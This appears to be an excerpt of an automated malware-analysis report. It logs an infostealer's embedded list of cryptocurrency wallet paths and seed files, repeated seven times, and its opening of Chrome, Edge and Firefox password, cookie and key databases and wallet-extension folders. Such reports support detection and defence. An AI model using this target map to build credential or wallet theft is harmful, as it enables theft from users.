                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: a78a39a396.exe, 0000000A.00000002.3165203944.0000000000D54000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
